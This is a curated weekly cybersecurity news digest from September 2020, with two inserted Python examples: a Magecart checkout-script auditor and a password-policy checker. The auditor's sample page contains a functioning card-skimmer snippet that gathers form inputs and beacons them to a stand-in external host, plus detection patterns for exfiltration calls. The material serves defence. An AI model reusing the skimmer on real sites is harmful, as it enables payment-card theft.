A Review of the Best News of the Week on Cyber Threats & Defense

Virginia’s Largest School System Hit With Ransomware (Dark Reading, Sep 14 2020)
Fairfax County Public Schools has launched an investigation following a ransomware attack on some of its technology systems.

Russian state hackers are targeting Biden and Trump campaigns, MSFT warns (Ars Technica, Sep 11 2020)
Russia’s most notorious hacking group is using new techniques to breach accounts.

Attackers Fight for Control of Sites Targeted in File Manager Vulnerability (Wordfence, Sep 10 2020)
Last week, we covered a vulnerability in the File Manager plugin installed on over 700,000 WordPress sites. By Friday, September 4, 2020, we recorded attacks on over 1.7 million sites, and by today, September 10, 2020, the total number of sites attacked has increased to over 2.6 million. We’ve seen evidence of multiple threat actors …


Filter Out the Noise
Since I started this curated newsletter in June 2017, I’ve clipped ~16,000 articles and narrowed them down into the best 20 per day & best 15 per week. This is my favorite way to cut through all the security marketing and hype. If you’re enjoying it, tell a friend. If you hate it, tell an enemy.
Thanks! – Lucas Samaras

US Court Documents Published in Ransomware Attack (Infosecurity Magazine, Sep 11 2020)
Cyber-attackers hit Louisiana court with ransomware, publish stolen documents online

12 checklist items for defeating Magecart attacks (SC Media, Sep 11 2020)
Magecart groups have made many successful attacks on high-profile companies over the past two years. In a Magecart attack, attackers covertly inject credit card skimming code into the checkout pages of e-commerce websites to exfiltrate data on thousands of customers. While some might only remember Magecart from the 2018 British Airways breach, one of these…
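The mechanism described above (a skimmer injected into the checkout page, reading card fields and beaconing them out) suggests a concrete control: inventory the scripts on the checkout page and alert on anything outside an allowlist. The following is an added example, not code from the SC Media article or its checklist; the sample checkout HTML, the allowlisted hostnames, the `.example` domains and the placeholder SRI hash are all constructed for illustration.

```python
"""Added example: script inventory check for a checkout page, suitable for a CI
job or synthetic monitor. Parses the HTML, lists external script origins and
inline scripts, and flags (a) external hosts not on the allowlist, (b) allowed
third-party scripts that lack an SRI integrity attribute, and (c) inline code
that both reads form fields and sends data off-page. All inputs are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.example"}  # constructed allowlist

# Heuristics for skimmer-like inline code: reads input values AND ships bytes somewhere.
FIELD_ACCESS = re.compile(r"\.value\b|getElementsBy|querySelector", re.I)
EXFIL = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon|new Image\(|WebSocket\(", re.I)


class ScriptCollector(HTMLParser):
    """Collects <script src> references and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []  # (src, has_integrity_attribute)
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def audit_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of findings; an empty list means the page matches the allowlist."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src, has_sri in p.external:
        host = urlsplit(src).hostname
        if host is None:  # relative URL: served by the shop's own origin
            continue
        if host not in allowed_hosts:
            findings.append(f"unexpected external script host: {host}")
        elif not has_sri:
            findings.append(f"third-party script without SRI integrity attribute: {src}")
    for code in p.inline:
        if FIELD_ACCESS.search(code) and EXFIL.search(code):
            findings.append("inline script reads form fields and sends data off-page")
    return findings


# Constructed checkout page: one allowed CDN script without SRI, one unknown
# host, and an inline skimmer that collects every input and beacons it out.
SAMPLE_CHECKOUT = """<html><body>
<form id="checkout"><input name="cardnumber"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example/lib/jquery.min.js" integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://cdn.example/lib/analytics.js"></script>
<script src="https://static-cdn.stats.example/g.js"></script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var d = {}; var inp = document.getElementsByTagName("input");
    for (var i = 0; i < inp.length; i++) { d[inp[i].name] = inp[i].value; }
    new Image().src = "https://static-cdn.stats.example/i.gif?q=" + btoa(JSON.stringify(d));
  });
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_html(SAMPLE_CHECKOUT):
        print("FINDING:", finding)
```

Run it against a snapshot of the live checkout page on a schedule and diff the findings against the previous run; a new external host or a newly appearing inline script on a payment page is exactly the change a Magecart injection produces. The SRI check only helps for third-party scripts you load by fixed URL, and the inline heuristic is deliberately conservative (it needs both a field read and a network primitive) to keep noise down.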

Interesting Attack on the EMV Smartcard Payment Standard (Schneier on Security, Sep 14 2020)
“It’s complicated, but it’s basically a man-in-the-middle attack that involves two smartphones. The first phone reads the actual smartcard, and then forwards the required information to a second phone. That second phone actually conducts the transaction on the POS terminal. That second phone is able to convince the POS terminal to conduct the transaction without requiring the normally required PIN.”

Securing Active Directory accounts against password-based attacks (Help Net Security, Sep 08 2020)
Traditional password-based security might be headed for extinction, but that moment is still far off. In the meantime, most of us need something to prevent our worst instincts when it comes to choosing passwords: using personal information, predictable (e.g., sequential) keystroke patterns, password variations, well-known substitutions, single words from a dictionary and – above all – reusing the same password for many different private and enterprise accounts.
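The patterns listed above (personal information, keyboard walks and sequential runs, well-known substitutions, bare dictionary words) are exactly what a password filter or self-service reset portal should reject before a password ever reaches Active Directory. The following is an added example, not code from the Help Net Security article; the banned-word list, keyboard rows, minimum length and the personal-information tokens are assumptions constructed for illustration, and a real deployment would load a breached-password corpus and company-specific terms instead.

```python
"""Added example: password screening in the spirit of an AD password filter.
Undoes common leetspeak substitutions, strips digit/punctuation affixes, and
rejects banned words, keyboard walks, sequential runs and personal tokens.
Word list, keyboard rows and tokens are constructed for illustration."""
import re

# Substitutions attackers undo in their wordlists ("P@ssw0rd" -> "password").
LEET_MAP = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                          "0": "o", "$": "s", "5": "s", "7": "t", "+": "t"})

# Constructed banned-word list (stand-in for a breached/common-password corpus).
BANNED_WORDS = {"password", "welcome", "letmein", "qwerty", "summer", "contoso"}

KEYBOARD_ROWS = ["1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm"]


def normalize(pw):
    """Lower-case and undo common character substitutions."""
    return pw.lower().translate(LEET_MAP)


def strip_affixes(word):
    """Drop leading/trailing non-letters: 'Summer2020!' -> 'summer'."""
    return re.sub(r"^[^a-z]+|[^a-z]+$", "", word)


def has_keyboard_walk(pw, run=4):
    """True if any `run` adjacent keys from one keyboard row appear (either direction)."""
    s = pw.lower()
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - run + 1):
            seg = row[i:i + run]
            if seg in s or seg[::-1] in s:
                return True
    return False


def has_sequential_run(pw, run=4):
    """True for runs like 'abcd', '1234' or 'dcba' (consecutive code points)."""
    for i in range(len(pw) - run + 1):
        chunk = [ord(c) for c in pw[i:i + run].lower()]
        diffs = {b - a for a, b in zip(chunk, chunk[1:])}
        if diffs == {1} or diffs == {-1}:
            return True
    return False


def check_password(pw, personal_tokens=(), min_len=12):
    """Return a list of policy violations; an empty list means the password passes."""
    problems = []
    norm = normalize(pw)
    # Strip affixes on the raw text first so '2020' is not turned into '2o2o' before stripping.
    core = normalize(strip_affixes(pw.lower()))
    if len(pw) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if core in BANNED_WORDS:
        problems.append("banned word (after undoing substitutions and affixes)")
    for tok in personal_tokens:  # username, company name, birth year, etc.
        t = tok.lower()
        if len(t) >= 3 and t in norm:
            problems.append(f"contains personal/company token '{tok}'")
    if has_keyboard_walk(pw):
        problems.append("keyboard walk")
    if has_sequential_run(pw):
        problems.append("sequential characters")
    return problems


if __name__ == "__main__":
    for candidate in ["P@ssw0rd2020!", "Qwerty!2020", "correct horse battery staple"]:
        print(candidate, "->", check_password(candidate, personal_tokens=["jsmith"]) or "OK")
```

Note that the checker deliberately does not score "complexity" by character classes, since `P@ssw0rd2020!` satisfies every such rule and is still rejected here as the dictionary word it is; length plus a breached-password lookup does more than class-mixing requirements.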

Combat data breaches by using training and technology (SC Media, Sep 08 2020)
Corporate data breaches are a big deal, and as data grows more valuable and regulations become stricter, it’s increasingly important to have the right mechanisms in place to prevent them. IBM’s 2020 Cost of a Data Breach report found that the average cost of a breach in the U.S. was more than $8 million.

Evilnum Cyberspies Update Arsenal in Recent Attacks (SecurityWeek, Sep 07 2020)
The threat group tracked as Evilnum was observed using updated tactics and tools in recent attacks, Cybereason’s Nocturnus research team reported last week.

Ripple20 Malware Highlights Industrial Security Challenges (Dark Reading, Sep 10 2020)
Ripple20 is a set of vulnerabilities in the widely embedded Treck TCP/IP stack rather than malware; poor security practices allowed those software flaws to propagate throughout industrial and IoT products for more than 20 years.

Why We Need to Pay Attention to Attacks on the Smart-Built Environment (Dark Reading, Sep 09 2020)
Are attacks on IoT physical security devices real or just theoretical? Professionals need to be aware of the real-life examples in order to guard against future attacks on their own businesses.

Researchers Discover Rare Form of Malware that Targets VoIP Softswitches (Infosecurity Magazine, Sep 10 2020)
A new type of Linux malware is designed to target a specific VoIP platform

BLURtooth Vulnerability Can Allow Bluetooth MITM Attacks (SecurityWeek, Sep 10 2020)
A security vulnerability in the Cross-Transport Key Derivation (CTKD) of devices supporting both Bluetooth BR/EDR and LE could allow an attacker to overwrite encryption keys, researchers have discovered.

Spear-Phishers Leverage Office 365 Ecosystem to Validate Stolen Creds in Real Time (Dark Reading, Sep 11 2020)
New attack technique uses Office 365 APIs to cross-check credentials against Azure Active Directory as the victim types them in.

Cyber-Risks Explode With Move to Telehealth Services (Dark Reading, Sep 10 2020)
The hasty shift to online delivery of primary care services since the COVID-19 outbreak has attracted significant attacker interest.

Four ways network traffic analysis benefits security teams (Help Net Security, Sep 11 2020)
The march towards digital transformation and the increasing volume of cyberattacks are finally driving IT security and network teams towards better collaboration. This idea isn’t new, but it’s finally being put into practice at many major enterprises. The reasons are fairly straightforward: all those new transformation initiatives – moving workloads to the cloud, pursuing virtualization or SD-WAN projects, etc. – create network traffic blind spots that can’t…

Zero Trust Adoption Increases During Lockdown (Infosecurity Magazine, Sep 11 2020)
Recent polls by Deloitte find zero trust adoption has increased in 2020